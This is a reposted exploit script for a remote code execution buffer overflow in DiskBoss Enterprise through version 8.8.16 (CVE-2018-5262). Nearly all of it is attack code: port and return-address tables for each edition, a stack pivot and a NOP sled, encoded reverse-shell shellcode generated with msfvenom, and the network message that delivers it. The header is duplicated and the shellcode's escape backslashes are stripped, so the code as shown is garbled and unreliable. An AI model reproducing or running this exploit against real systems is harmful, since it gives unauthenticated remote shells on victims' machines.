# Exploit Title: DiskBoss <= 8.8.16 - Unauthenticated Remote Code Execution
# Date: 2017-08-27
# Exploit Author: Arris Huijgen
# Vendor Homepage: http://www.diskboss.com/
# # Exploit Title: DiskBoss <= 8.8.16 - Unauthenticated Remote Code Execution
# Date: 2017-08-27
# Exploit Author: Arris Huijgen
# Vendor Homepage: http://www.diskboss.com/
# Software Link: http://www.diskboss.com/setups/diskbossent_setup_v8.8.16.exe
# Version: Through 8.8.16
# Tested on: Windows 7 SP1 x64, Windows XP SP3 x86
# CVE: CVE-2018-5262
# Usage
# 1. Update the Target section
# 2. Update the shellcode
# 3. Launch!
import socket
from struct import pack
# Software editions (port, offset)
free8416 = (8096, 0x10036e9a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
pro8416 = (8097, 0x10036e9a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
ult8416 = (8098, 0x10036e9a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
srv8416 = (8094, 0x1001806e) # ADD ESP,8 | RET 0x04 @ libpal.dll
ent8416 = (8094, 0x1001806e) # ADD ESP,8 | RET 0x04 @ libpal.dll
ent8512 = (8094, 0x100180ee) # ADD ESP,8 | RET 0x04 @ libpal.dll
free8816 = (8096, 0x10037f6a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
pro8816 = (8097, 0x10037f6a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
ult8816 = (8098, 0x10037f6a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
srv8816 = (8094, 0x100180f9) # ADD ESP,8 | RET 0x04 @ libpal.dll
ent8816 = (8094, 0x100180f9) # ADD ESP,8 | RET 0x04 @ libpal.dll
# Target
host = '127.0.0.1'
(port, addr) = ent8816
def main():
# Connect
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print '[+] Connected to %s:%d' % (host, port)
# Memory
size = 1000
offset = 128
# Payload
preret = 'xEBx06x90x90' # JMP 0x06
ret = pack('<I', addr) # Depending on the software edition
pivot = 'xe9x3fxfbxffxff' # JMP -0x4BC
# msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1234 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b 'x00'
# Payload size: 351 bytes
sc = (
"xb8x80xacx48x8fxd9xc4xd9x74x24xf4x5dx2bxc9xb1"
"x52x31x45x12x03x45x12x83x45xa8xaax7axb9x59xa8"
"x85x41x9axcdx0cxa4xabxcdx6bxadx9cxfdxf8xe3x10"
"x75xacx17xa2xfbx79x18x03xb1x5fx17x94xeax9cx36"
"x16xf1xf0x98x27x3ax05xd9x60x27xe4x8bx39x23x5b"
"x3bx4dx79x60xb0x1dx6fxe0x25xd5x8exc1xf8x6dxc9"
"xc1xfbxa2x61x48xe3xa7x4cx02x98x1cx3ax95x48x6d"
"xc3x3axb5x41x36x42xf2x66xa9x31x0ax95x54x42xc9"
"xe7x82xc7xc9x40x40x7fx35x70x85xe6xbex7ex62x6c"
"x98x62x75xa1x93x9fxfex44x73x16x44x63x57x72x1e"
"x0axcexdexf1x33x10x81xaex91x5bx2cxbaxabx06x39"
"x0fx86xb8xb9x07x91xcbx8bx88x09x43xa0x41x94x94"
"xc7x7bx60x0ax36x84x91x03xfdxd0xc1x3bxd4x58x8a"
"xbbxd9x8cx1dxebx75x7fxdex5bx36x2fxb6xb1xb9x10"
"xa6xbax13x39x4dx41xf4x39x92x49x05xaex90x49x01"
"xfcx1cxafx63x10x49x78x1cx89xd0xf2xbdx56xcfx7f"
"xfdxddxfcx80xb0x15x88x92x25xd6xc7xc8xe0xe9xfd"
"x64x6ex7bx9ax74xf9x60x35x23xaex57x4cxa1x42xc1"
"xe6xd7x9ex97xc1x53x45x64xcfx5ax08xd0xebx4cxd4"
"xd9xb7x38x88x8fx61x96x6ex66xc0x40x39xd5x8ax04"
"xbcx15x0dx52xc1x73xfbxbax70x2axbaxc5xbdxbax4a"
"xbexa3x5axb4x15x60x7ax57xbfx9dx13xcex2ax1cx7e"
"xf1x81x63x87x72x23x1cx7cx6ax46x19x38x2cxbbx53"
"x51xd9xbbxc0x52xc8"
)
# Compile payload
fill = 'A' * (offset - len(preret))
code = fill + preret + ret + pivot
nops = 'x90' * (size - len(code) - len(sc) - 100)
payload = code + nops + sc + 'C' * 100
# Compile message
msg = (
'x75x19xbaxab' +
'x03x00x00x00' +
'x00x40x00x00' +
pack('<I', len(payload)) +
pack('<I', len(payload)) +
pack('<I', ord(payload[-1])) +
payload
)
# Send message
s.send(msg)
print '[+] Exploit sent!'
if __name__ == '__main__':
main()
DiskBoss Enterprise 8.8.16 Buffer Overflow
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 404